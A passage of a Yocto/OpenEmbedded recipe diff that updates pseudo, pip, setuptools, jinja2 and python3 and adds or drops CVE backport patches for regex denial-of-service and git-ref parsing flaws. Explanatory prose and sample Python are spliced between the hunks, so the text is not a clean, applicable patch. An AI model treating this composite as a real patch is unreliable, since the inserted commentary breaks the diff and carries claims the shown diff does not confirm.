--ssize_t getxattr(const char *path, const char *name, void *value, size_t size); /* flags=0 */
--ssize_t lgetxattr(const char *path, const char *name, void *value, size_t size); /* flags=AT_SYMLINK_NOFOLLOW */
--ssize_t fgetxattr(int filedes, const char *name, void *value, size_t size);
--int setxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=0 */
--int lsetxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=AT_SYMLINK_NOFOLLOW */
--int fsetxattr(int filedes, const char *name, const void *value, size_t size, int xflags);
--ssize_t listxattr(const char *path, char *list, size_t size); /* flags=0 */
--ssize_t llistxattr(const char *path, char *list, size_t size); /* flags=AT_SYMLINK_NOFOLLOW */
--ssize_t flistxattr(int filedes, char *list, size_t size);
--int removexattr(const char *path, const char *name); /* flags=0 */
--int lremovexattr(const char *path, const char *name); /* flags=AT_SYMLINK_NOFOLLOW */
--int fremovexattr(int filedes, const char *name);
-+ssize_t getxattr(const char *path, const char *name, void *value, size_t size); /* flags=0, version="GLIBC_2.3" */
-+ssize_t lgetxattr(const char *path, const char *name, void *value, size_t size); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+ssize_t fgetxattr(int filedes, const char *name, void *value, size_t size); /* version="GLIBC_2.3" */
-+int setxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=0, version="GLIBC_2.3" */
-+int lsetxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+int fsetxattr(int filedes, const char *name, const void *value, size_t size, int xflags); /* version="GLIBC_2.3" */
-+ssize_t listxattr(const char *path, char *list, size_t size); /* flags=0, version="GLIBC_2.3" */
-+ssize_t llistxattr(const char *path, char *list, size_t size); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+ssize_t flistxattr(int filedes, char *list, size_t size); /* version="GLIBC_2.3" */
-+int removexattr(const char *path, const char *name); /* flags=0, version="GLIBC_2.3" */
-+int lremovexattr(const char *path, const char *name); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+int fremovexattr(int filedes, const char *name); /* version="GLIBC_2.3" */
diff --git a/meta/recipes-devtools/pseudo/pseudo.inc b/meta/recipes-devtools/pseudo/pseudo.inc
index 50e30064bd..e6512bc6e6 100644
--- a/meta/recipes-devtools/pseudo/pseudo.inc
+++ b/meta/recipes-devtools/pseudo/pseudo.inc
@@ -4,6 +4,7 @@
SUMMARY = "Pseudo gives fake root capabilities to a normal user"
HOMEPAGE = "http://git.yoctoproject.org/cgit/cgit.cgi/pseudo"
+DESCRIPTION = "The pseudo utility offers a way to run commands in a virtualized root environment."
LIC_FILES_CHKSUM = "file://COPYING;md5=a1d8023a6f953ac6ea4af765ff62d574"
SECTION = "base"
LICENSE = "LGPL2.1"
@@ -111,6 +112,19 @@ do_compile_prepend_class-nativesdk () {
fi
}
+do_compile_append_class-native () {
+ if [ '${@bb.data.inherits_class('uninative', d)}' = 'True' ]; then
+ for i in PSEUDO_PORT_UNIX_SYNCFS PSEUDO_PORT_UIDS_GENERIC PSEUDO_PORT_LINUX_NEWCLONE PSEUDO_PORT_LINUX_XATTR PSEUDO_PORT_LINUX_STATVFS; do
+ grep $i.1 ${S}/pseudo_ports.h
+ if [ $? != 0 ]; then
+ echo "$i not enabled in pseudo which is incompatible with uninative"
+ exit 1
+ fi
+ done
+ fi
+}
+
+
do_install () {
oe_runmake 'DESTDIR=${D}' ${MAKEOPTS} 'LIB=lib/pseudo/lib$(MARK64)' install
}
diff --git a/meta/recipes-devtools/pseudo/pseudo_git.bb b/meta/recipes-devtools/pseudo/pseudo_git.bb
index 419bac19fe..b5da3f0e29 100644
--- a/meta/recipes-devtools/pseudo/pseudo_git.bb
+++ b/meta/recipes-devtools/pseudo/pseudo_git.bb
@@ -1,22 +1,19 @@
require pseudo.inc
-SRC_URI = "git://git.yoctoproject.org/pseudo \
+SRC_URI = "git://git.yoctoproject.org/pseudo;branch=oe-core \
file://0001-configure-Prune-PIE-flags.patch \
file://fallback-passwd \
file://fallback-group \
- file://moreretries.patch \
- file://toomanyfiles.patch \
- file://0001-maketables-wrappers-use-Python-3.patch \
- file://0001-Add-statx.patch \
- file://0001-realpath.c-Remove-trailing-slashes.patch \
- file://0006-xattr-adjust-for-attr-2.4.48-release.patch \
- file://seccomp.patch \
- file://0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch \
- file://0001-pseudo_ipc.h-Fix-enum-typedef.patch \
- file://xattr_version.patch \
"
+SRC_URI:append:class-native = " \
+ http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \
+ file://older-glibc-symbols.patch"
+SRC_URI:append:class-nativesdk = " \
+ http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \
+ file://older-glibc-symbols.patch"
+SRC_URI[prebuilt.sha256sum] = "ed9f456856e9d86359f169f46a70ad7be4190d6040282b84c8d97b99072485aa"
-SRCREV = "060058bb29f70b244e685b3c704eb0641b736f73"
+SRCREV = "2b4b88eb513335b0ece55fe51854693d9b20de35"
S = "${WORKDIR}/git"
PV = "1.9.0+git${SRCPV}"
diff --git a/meta/recipes-devtools/python-numpy/python-numpy.inc b/meta/recipes-devtools/python-numpy/python-numpy.inc
index 42032a04a8..4cc506474b 100644
--- a/meta/recipes-devtools/python-numpy/python-numpy.inc
+++ b/meta/recipes-devtools/python-numpy/python-numpy.inc
@@ -1,4 +1,6 @@
SUMMARY = "A sophisticated Numeric Processing Package for Python"
+HOMEPAGE = "https://numpy.org/"
+DESCRIPTION = "NumPy is the fundamental package needed for scientific computing with Python."
SECTION = "devel/python"
LICENSE = "BSD-3-Clause & BSD-2-Clause & PSF & Apache-2.0 & BSD & MIT"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=1a32aba007a415aa8a1c708a0e2b86a1"
diff --git a/meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch b/meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch
deleted file mode 100644
index e16b99bcb9..0000000000
--- a/meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch
+++ /dev/null
@@ -1,248 +0,0 @@
-From 0b297d4ff1c0e4480ad33acae793fbaf4bf015b4 Mon Sep 17 00:00:00 2001
-From: Victor Stinner <vstinner@python.org>
-Date: Thu, 2 Apr 2020 02:52:20 +0200
-Subject: [PATCH] bpo-39503: CVE-2020-8492: Fix AbstractBasicAuthHandler
- (GH-18284)
-
-Upstream-Status: Backport
-(https://github.com/python/cpython/commit/0b297d4ff1c0e4480ad33acae793fbaf4bf015b4)
-
-CVE: CVE-2020-8492
-
-The AbstractBasicAuthHandler class of the urllib.request module uses
-an inefficient regular expression which can be exploited by an
-attacker to cause a denial of service. Fix the regex to prevent the
-catastrophic backtracking. Vulnerability reported by Ben Caller
-and Matt Schwager.
-
-AbstractBasicAuthHandler of urllib.request now parses all
-WWW-Authenticate HTTP headers and accepts multiple challenges per
-header: use the realm of the first Basic challenge.
-
-Co-Authored-By: Serhiy Storchaka <storchaka@gmail.com>
-Signed-off-by: Trevor Gamblin <trevor.gamblin@windriver.com>
----
- Lib/test/test_urllib2.py | 90 ++++++++++++-------
- Lib/urllib/request.py | 69 ++++++++++----
- .../2020-03-25-16-02-16.bpo-39503.YmMbYn.rst | 3 +
- .../2020-01-30-16-15-29.bpo-39503.B299Yq.rst | 5 ++
- 4 files changed, 115 insertions(+), 52 deletions(-)
- create mode 100644 Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
- create mode 100644 Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
-
-diff --git a/Lib/test/test_urllib2.py b/Lib/test/test_urllib2.py
-index 8abedaac98..e69ac3e213 100644
---- a/Lib/test/test_urllib2.py
-+++ b/Lib/test/test_urllib2.py
-@@ -1446,40 +1446,64 @@ class HandlerTests(unittest.TestCase):
- bypass = {'exclude_simple': True, 'exceptions': []}
- self.assertTrue(_proxy_bypass_macosx_sysconf('test', bypass))
-
-- def test_basic_auth(self, quote_char='"'):
-- opener = OpenerDirector()
-- password_manager = MockPasswordManager()
-- auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
-- realm = "ACME Widget Store"
-- http_handler = MockHTTPHandler(
-- 401, 'WWW-Authenticate: Basic realm=%s%s%s\r\n\r\n' %
-- (quote_char, realm, quote_char))
-- opener.add_handler(auth_handler)
-- opener.add_handler(http_handler)
-- self._test_basic_auth(opener, auth_handler, "Authorization",
-- realm, http_handler, password_manager,
-- "http://acme.example.com/protected",
-- "http://acme.example.com/protected",
-- )
--
-- def test_basic_auth_with_single_quoted_realm(self):
-- self.test_basic_auth(quote_char="'")
--
-- def test_basic_auth_with_unquoted_realm(self):
-- opener = OpenerDirector()
-- password_manager = MockPasswordManager()
-- auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
-- realm = "ACME Widget Store"
-- http_handler = MockHTTPHandler(
-- 401, 'WWW-Authenticate: Basic realm=%s\r\n\r\n' % realm)
-- opener.add_handler(auth_handler)
-- opener.add_handler(http_handler)
-- with self.assertWarns(UserWarning):
-+ def check_basic_auth(self, headers, realm):
-+ with self.subTest(realm=realm, headers=headers):
-+ opener = OpenerDirector()
-+ password_manager = MockPasswordManager()
-+ auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
-+ body = '\r\n'.join(headers) + '\r\n\r\n'
-+ http_handler = MockHTTPHandler(401, body)
-+ opener.add_handler(auth_handler)
-+ opener.add_handler(http_handler)
- self._test_basic_auth(opener, auth_handler, "Authorization",
-- realm, http_handler, password_manager,
-- "http://acme.example.com/protected",
-- "http://acme.example.com/protected",
-- )
-+ realm, http_handler, password_manager,
-+ "http://acme.example.com/protected",
-+ "http://acme.example.com/protected")
-+
-+ def test_basic_auth(self):
-+ realm = "realm2@example.com"
-+ realm2 = "realm2@example.com"
-+ basic = f'Basic realm="{realm}"'
-+ basic2 = f'Basic realm="{realm2}"'
-+ other_no_realm = 'Otherscheme xxx'
-+ digest = (f'Digest realm="{realm2}", '
-+ f'qop="auth, auth-int", '
-+ f'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", '
-+ f'opaque="5ccc069c403ebaf9f0171e9517f40e41"')
-+ for realm_str in (
-+ # test "quote" and 'quote'
-+ f'Basic realm="{realm}"',
-+ f"Basic realm='{realm}'",
-+
-+ # charset is ignored
-+ f'Basic realm="{realm}", charset="UTF-8"',
-+
-+ # Multiple challenges per header
-+ f'{basic}, {basic2}',
-+ f'{basic}, {other_no_realm}',
-+ f'{other_no_realm}, {basic}',
-+ f'{basic}, {digest}',
-+ f'{digest}, {basic}',
-+ ):
-+ headers = [f'WWW-Authenticate: {realm_str}']
-+ self.check_basic_auth(headers, realm)
-+
-+ # no quote: expect a warning
-+ with support.check_warnings(("Basic Auth Realm was unquoted",
-+ UserWarning)):
-+ headers = [f'WWW-Authenticate: Basic realm={realm}']
-+ self.check_basic_auth(headers, realm)
-+
-+ # Multiple headers: one challenge per header.
-+ # Use the first Basic realm.
-+ for challenges in (
-+ [basic, basic2],
-+ [basic, digest],
-+ [digest, basic],
-+ ):
-+ headers = [f'WWW-Authenticate: {challenge}'
-+ for challenge in challenges]
-+ self.check_basic_auth(headers, realm)
-
- def test_proxy_basic_auth(self):
- opener = OpenerDirector()
-diff --git a/Lib/urllib/request.py b/Lib/urllib/request.py
-index 7fe50535da..2a3d71554f 100644
---- a/Lib/urllib/request.py
-+++ b/Lib/urllib/request.py
-@@ -937,8 +937,15 @@ class AbstractBasicAuthHandler:
-
- # allow for double- and single-quoted realm values
- # (single quotes are a violation of the RFC, but appear in the wild)
-- rx = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+'
-- 'realm=(["\']?)([^"\']*)\\2', re.I)
-+ rx = re.compile('(?:^|,)' # start of the string or ','
-+ '[ \t]*' # optional whitespaces
-+ '([^ \t]+)' # scheme like "Basic"
-+ '[ \t]+' # mandatory whitespaces
-+ # realm=xxx
-+ # realm='xxx'
-+ # realm="xxx"
-+ 'realm=(["\']?)([^"\']*)\\2',
-+ re.I)
-
- # XXX could pre-emptively send auth info already accepted (RFC 2617,
- # end of section 2, and section 1.2 immediately after "credentials"
-@@ -950,27 +957,51 @@ class AbstractBasicAuthHandler:
- self.passwd = password_mgr
- self.add_password = self.passwd.add_password
-
-+ def _parse_realm(self, header):
-+ # parse WWW-Authenticate header: accept multiple challenges per header
-+ found_challenge = False
-+ for mo in AbstractBasicAuthHandler.rx.finditer(header):
-+ scheme, quote, realm = mo.groups()
-+ if quote not in ['"', "'"]:
-+ warnings.warn("Basic Auth Realm was unquoted",
-+ UserWarning, 3)
-+
-+ yield (scheme, realm)
-+
-+ found_challenge = True
-+
-+ if not found_challenge:
-+ if header:
-+ scheme = header.split()[0]
-+ else:
-+ scheme = ''
-+ yield (scheme, None)
-+
- def http_error_auth_reqed(self, authreq, host, req, headers):
- # host may be an authority (without userinfo) or a URL with an
- # authority
-- # XXX could be multiple headers
-- authreq = headers.get(authreq, None)
-+ headers = headers.get_all(authreq)
-+ if not headers:
-+ # no header found
-+ return
-
-- if authreq:
-- scheme = authreq.split()[0]
-- if scheme.lower() != 'basic':
-- raise ValueError("AbstractBasicAuthHandler does not"
-- " support the following scheme: '%s'" %
-- scheme)
-- else:
-- mo = AbstractBasicAuthHandler.rx.search(authreq)
-- if mo:
-- scheme, quote, realm = mo.groups()
-- if quote not in ['"',"'"]:
-- warnings.warn("Basic Auth Realm was unquoted",
-- UserWarning, 2)
-- if scheme.lower() == 'basic':
-- return self.retry_http_basic_auth(host, req, realm)
-+ unsupported = None
-+ for header in headers:
-+ for scheme, realm in self._parse_realm(header):
-+ if scheme.lower() != 'basic':
-+ unsupported = scheme
-+ continue
-+
-+ if realm is not None:
-+ # Use the first matching Basic challenge.
-+ # Ignore following challenges even if they use the Basic
-+ # scheme.
-+ return self.retry_http_basic_auth(host, req, realm)
-+
-+ if unsupported is not None:
-+ raise ValueError("AbstractBasicAuthHandler does not "
-+ "support the following scheme: %r"
-+ % (scheme,))
-
- def retry_http_basic_auth(self, host, req, realm):
- user, pw = self.passwd.find_user_password(realm, host)
-diff --git a/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst b/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
-new file mode 100644
-index 0000000000..be80ce79d9
---- /dev/null
-+++ b/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
-@@ -0,0 +1,3 @@
-+:class:`~urllib.request.AbstractBasicAuthHandler` of :mod:`urllib.request`
-+now parses all WWW-Authenticate HTTP headers and accepts multiple challenges
-+per header: use the realm of the first Basic challenge.
-diff --git a/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst b/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
-new file mode 100644
-index 0000000000..9f2800581c
---- /dev/null
-+++ b/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
-@@ -0,0 +1,5 @@
-+CVE-2020-8492: The :class:`~urllib.request.AbstractBasicAuthHandler` class of the
-+:mod:`urllib.request` module uses an inefficient regular expression which can
-+be exploited by an attacker to cause a denial of service. Fix the regex to
-+prevent the catastrophic backtracking. Vulnerability reported by Ben Caller
-+and Matt Schwager.
---
-2.24.1
-
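
This backport is dropped because the python3 recipe below upgrades to 3.8.18, which already ships the fix. The heart of the change is the anchored challenge regex plus per-header parsing; restated as a standalone sketch (the constant and function names here are illustrative, not the stdlib API):

    import re
    import warnings

    # Same shape as the patched AbstractBasicAuthHandler.rx shown above.
    CHALLENGE_RX = re.compile(
        '(?:^|,)'            # start of the string or ','
        '[ \t]*'             # optional whitespace
        '([^ \t]+)'          # scheme, e.g. "Basic"
        '[ \t]+'             # mandatory whitespace
        'realm=(["\']?)([^"\']*)\\2',
        re.I)

    def parse_challenges(header):
        # Yield (scheme, realm) pairs from one WWW-Authenticate header value.
        for mo in CHALLENGE_RX.finditer(header):
            scheme, quote, realm = mo.groups()
            if quote not in ('"', "'"):
                warnings.warn("Basic Auth Realm was unquoted", UserWarning)
            yield scheme, realm

    print(list(parse_challenges('Basic realm="a@example.com", Otherscheme xxx')))
    # -> [('Basic', 'a@example.com')]

Anchoring each challenge at the start of the string or a comma is what removes the catastrophic backtracking of the old pattern.
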
diff --git a/meta/recipes-devtools/python/python-setuptools.inc b/meta/recipes-devtools/python/python-setuptools.inc
index 29be852f66..5faf62bc3a 100644
--- a/meta/recipes-devtools/python/python-setuptools.inc
+++ b/meta/recipes-devtools/python/python-setuptools.inc
@@ -8,6 +8,8 @@ PYPI_PACKAGE_EXT = "zip"
inherit pypi
+SRC_URI += " file://CVE-2022-40897.patch "
+
SRC_URI_append_class-native = " file://0001-conditionally-do-not-fetch-code-by-easy_install.patch"
SRC_URI[md5sum] = "0c956eea142af9c2b02d72e3c042af30"
diff --git a/meta/recipes-devtools/python/python3-jinja2_2.11.2.bb b/meta/recipes-devtools/python/python3-jinja2_2.11.3.bb
index 89538d2f27..9f054c6024 100644
--- a/meta/recipes-devtools/python/python3-jinja2_2.11.2.bb
+++ b/meta/recipes-devtools/python/python3-jinja2_2.11.3.bb
@@ -1,12 +1,15 @@
DESCRIPTION = "Python Jinja2: A small but fast and easy to use stand-alone template engine written in pure python."
+HOMEPAGE = "https://pypi.org/project/Jinja2/"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENSE.rst;md5=5dc88300786f1c214c1e9827a5229462"
-SRC_URI[sha256sum] = "89aab215427ef59c34ad58735269eb58b1a5808103067f7bb9d5836c651b3bb0"
+SRC_URI[sha256sum] = "a6d58433de0ae800347cab1fa3043cebbabe8baa9d29e668f1c768cb87a333c6"
PYPI_PACKAGE = "Jinja2"
+CVE_PRODUCT = "jinja2 jinja"
+
CLEANBROKEN = "1"
inherit pypi setuptools3
diff --git a/meta/recipes-devtools/python/python3-magic_0.4.15.bb b/meta/recipes-devtools/python/python3-magic_0.4.15.bb
index 698016ba4c..b73310c808 100644
--- a/meta/recipes-devtools/python/python3-magic_0.4.15.bb
+++ b/meta/recipes-devtools/python/python3-magic_0.4.15.bb
@@ -14,6 +14,11 @@ inherit pypi setuptools3
SRC_URI[md5sum] = "e384c95a47218f66c6501cd6dd45ff59"
SRC_URI[sha256sum] = "f3765c0f582d2dfc72c15f3b5a82aecfae9498bd29ca840d72f37d7bd38bfcd5"
-RDEPENDS_${PN} += "file"
+DEPENDS_append_class-native = " file-replacement-native"
+
+RDEPENDS_${PN} += "file \
+ ${PYTHON_PN}-ctypes \
+ ${PYTHON_PN}-io \
+ ${PYTHON_PN}-shell"
BBCLASSEXTEND = "native"
diff --git a/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch b/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch
new file mode 100644
index 0000000000..a38ab57bc6
--- /dev/null
+++ b/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch
@@ -0,0 +1,48 @@
+From c4fd13410b9a219f77fc30775d4a0ac9f69725bd Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 16 Jun 2022 09:52:43 +0530
+Subject: [PATCH] CVE-2021-3572
+
+Upstream-Status: Backport [https://github.com/pypa/pip/commit/e46bdda9711392fec0c45c1175bae6db847cb30b]
+CVE: CVE-2021-3572
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ news/9827.bugfix.rst | 3 +++
+ src/pip/_internal/vcs/git.py | 10 ++++++++--
+ 2 files changed, 11 insertions(+), 2 deletions(-)
+ create mode 100644 news/9827.bugfix.rst
+
+diff --git a/news/9827.bugfix.rst b/news/9827.bugfix.rst
+new file mode 100644
+index 0000000..e0d27c3
+--- /dev/null
++++ b/news/9827.bugfix.rst
+@@ -0,0 +1,3 @@
++**SECURITY**: Stop splitting on unicode separators in git references,
++which could be maliciously used to install a different revision on the
++repository.
+diff --git a/src/pip/_internal/vcs/git.py b/src/pip/_internal/vcs/git.py
+index 7483303..1b895f6 100644
+--- a/src/pip/_internal/vcs/git.py
++++ b/src/pip/_internal/vcs/git.py
+@@ -137,9 +137,15 @@ class Git(VersionControl):
+ output = cls.run_command(['show-ref', rev], cwd=dest,
+ show_stdout=False, on_returncode='ignore')
+ refs = {}
+- for line in output.strip().splitlines():
++ # NOTE: We do not use splitlines here since that would split on other
++ # unicode separators, which can be maliciously used to install a
++ # different revision.
++ for line in output.strip().split("\n"):
++ line = line.rstrip("\r")
++ if not line:
++ continue
+ try:
+- sha, ref = line.split()
++ ref_sha, ref_name = line.split(" ", maxsplit=2)
+ except ValueError:
+ # Include the offending line to simplify troubleshooting if
+ # this error ever occurs.
+--
+2.25.1
+
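
The key point of the patch is that str.splitlines() also splits on Unicode separators such as U+2028, which a malicious server could embed in a ref name to smuggle an extra line past the parser, whereas splitting on "\n" only does not. A two-line illustration (the values are invented for the example):

    line = "abc123 refs/heads/main\u2028deadbeef refs/tags/evil"
    print(line.splitlines())  # two entries: the separator is treated as a line break
    print(line.split("\n"))   # one entry: the separator stays inside the ref name
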
diff --git a/meta/recipes-devtools/python/python3-pip_20.0.2.bb b/meta/recipes-devtools/python/python3-pip_20.0.2.bb
index 08738fb2f9..e24c6f4477 100644
--- a/meta/recipes-devtools/python/python3-pip_20.0.2.bb
+++ b/meta/recipes-devtools/python/python3-pip_20.0.2.bb
@@ -6,6 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=8ba06d529c955048e5ddd7c45459eb2e"
DEPENDS += "python3 python3-setuptools-native"
+SRC_URI += "file://CVE-2021-3572.patch "
SRC_URI[md5sum] = "7d42ba49b809604f0df3d55df1c3fd86"
SRC_URI[sha256sum] = "7db0c8ea4c7ea51c8049640e8e6e7fde949de672bfa4949920675563a5a6967f"
diff --git a/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb b/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb
index 8f60834c17..8452d7fa9f 100644
--- a/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb
+++ b/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb
@@ -18,7 +18,7 @@ SRC_URI[sha256sum] = "4f5ba9374a46c98729dd3727d993f5e17ed0286fd6738ed464fe4efa06
S = "${WORKDIR}/pycairo-${PV}"
-inherit meson pkgconfig
+inherit meson pkgconfig python3targetconfig
CFLAGS += "-fPIC"
diff --git a/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb b/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
index 6babf0cae8..29825492b9 100644
--- a/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
+++ b/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
@@ -1,4 +1,6 @@
SUMMARY = "Python GObject bindings"
+HOMEPAGE = "https://gitlab.gnome.org/GNOME/pygobject"
+DESCRIPTION = "PyGObject is a Python package which provides bindings for GObject based libraries such as GTK, GStreamer, WebKitGTK, GLib, GIO and many more."
SECTION = "devel/python"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7"
diff --git a/meta/recipes-devtools/python/python3-scons_3.1.2.bb b/meta/recipes-devtools/python/python3-scons_3.1.2.bb
index ce117a92d4..12122131a5 100644
--- a/meta/recipes-devtools/python/python3-scons_3.1.2.bb
+++ b/meta/recipes-devtools/python/python3-scons_3.1.2.bb
@@ -1,4 +1,5 @@
SUMMARY = "Software Construction tool (make/autotools replacement)"
+HOMEPAGE = "https://github.com/SCons/scons"
SECTION = "devel/python"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${WORKDIR}/LICENSE-python3-scons-${PV};md5=e14e1b33428df24a40a782ae142785d0"
diff --git a/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch b/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch
new file mode 100644
index 0000000000..9150cea07e
--- /dev/null
+++ b/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch
@@ -0,0 +1,29 @@
+From 43a9c9bfa6aa626ec2a22540bea28d2ca77964be Mon Sep 17 00:00:00 2001
+From: "Jason R. Coombs" <jaraco@jaraco.com>
+Date: Fri, 4 Nov 2022 13:47:53 -0400
+Subject: [PATCH] Limit the amount of whitespace to search/backtrack. Fixes
+ #3659.
+
+CVE: CVE-2022-40897
+Upstream-Status: Backport [
+Upstream : https://github.com/pypa/setuptools/commit/43a9c9bfa6aa626ec2a22540bea28d2ca77964be
+Import from Ubuntu: http://archive.ubuntu.com/ubuntu/pool/main/s/setuptools/setuptools_45.2.0-1ubuntu0.1.debian.tar.xz
+]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+---
+ setuptools/package_index.py | 2 +-
+ setuptools/tests/test_packageindex.py | 1 -
+ 2 files changed, 1 insertion(+), 2 deletions(-)
+
+--- setuptools-45.2.0.orig/setuptools/package_index.py
++++ setuptools-45.2.0/setuptools/package_index.py
+@@ -215,7 +215,7 @@ def unique_values(func):
+ return wrapper
+
+
+-REL = re.compile(r"""<([^>]*\srel\s*=\s*['"]?([^'">]+)[^>]*)>""", re.I)
++REL = re.compile(r"""<([^>]*\srel\s{0,10}=\s{0,10}['"]?([^'" >]+)[^>]*)>""", re.I)
+ # this line is here to fix emacs' cruddy broken syntax highlighting
+
+
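
The fix bounds the whitespace quantifiers around '=' (\s{0,10} instead of \s*) so a crafted page with long runs of spaces can no longer drive the regex into catastrophic backtracking, while ordinary rel links still match. A quick standalone check using the patched pattern (the sample HTML is invented):

    import re

    REL = re.compile(r"""<([^>]*\srel\s{0,10}=\s{0,10}['"]?([^'" >]+)[^>]*)>""", re.I)

    html = '<a rel="homepage" href="https://example.org/pkg/">pkg</a>'
    print(REL.search(html).group(2))  # homepage
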
diff --git a/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch b/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
index c4fae09a5b..4ac0e140cc 100644
--- a/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
+++ b/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
@@ -14,17 +14,21 @@ Upstream-Status: Submitted [https://github.com/python/cpython/pull/13196]
Signed-off-by: Matthias Schoepfer <matthias.schoepfer@ithinx.io>
%% original patch: 0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
+
+Updated to apply after dea270a2a80214de22afadaaca2043d0d782eb7d
+
+Signed-off-by: Tim Orling <tim.orling@konsulko.com>
---
configure.ac | 175 +++++++--------------------------------------------
1 file changed, 21 insertions(+), 154 deletions(-)
diff --git a/configure.ac b/configure.ac
-index ede710e..bc81b0b 100644
+index de83332dd3..16b02d0798 100644
--- a/configure.ac
+++ b/configure.ac
-@@ -710,160 +710,27 @@ fi
- MULTIARCH=$($CC --print-multiarch 2>/dev/null)
- AC_SUBST(MULTIARCH)
+@@ -719,160 +719,27 @@ then
+ fi
+
-AC_MSG_CHECKING([for the platform triplet based on compiler characteristics])
-cat >> conftest.c <<EOF
@@ -185,25 +189,25 @@ index ede710e..bc81b0b 100644
+## Need to handle macos, vxworks and hurd special (?) :-/
+case ${target_os} in
+ darwin*)
-+ PLATFORM_TRIPLET=darwin
-+ ;;
++ PLATFORM_TRIPLET=darwin
++ ;;
+ hurd*)
-+ PLATFORM_TRIPLET=i386-gnu
-+ ;;
++ PLATFORM_TRIPLET=i386-gnu
++ ;;
+ vxworks*)
-+ PLATFORM_TRIPLET=vxworks
-+ ;;
++ PLATFORM_TRIPLET=vxworks
++ ;;
+ *)
+ if test "${target_cpu}" != "i686"; then
-+ PLATFORM_TRIPLET=${target_cpu}-${target_os}
-+ else
-+ PLATFORM_TRIPLET=i386-${target_os}
-+ fi
-+ ;;
-+esac
++ PLATFORM_TRIPLET=${target_cpu}-${target_os}
++ else
++ PLATFORM_TRIPLET=i386-${target_os}
++ fi
++ ;;
++esac
- if test x$PLATFORM_TRIPLET != x && test x$MULTIARCH != x; then
- if test x$PLATFORM_TRIPLET != x$MULTIARCH; then
+ if test x$PLATFORM_TRIPLET != xdarwin; then
+ MULTIARCH=$($CC --print-multiarch 2>/dev/null)
--
-2.24.1
+2.32.0
diff --git a/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch b/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch
new file mode 100644
index 0000000000..a44d3396a6
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch
@@ -0,0 +1,33 @@
+From 7a2bddfa437be633bb6945d0e6b7d6f27da870ad Mon Sep 17 00:00:00 2001
+From: Tim Orling <timothy.t.orling@intel.com>
+Date: Fri, 18 Jun 2021 11:56:50 -0700
+Subject: [PATCH] test_ctypes.test_find: skip without tools-sdk
+
+These tests need full packagegroup-core-buildessential, the
+easiest way to dynamically check for that is looking for
+'tools-sdk' in IMAGE_FEATURES.
+
+Upstream-Status: Inappropriate [oe-specific]
+
+Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
+---
+ Lib/ctypes/test/test_find.py | 2 ++
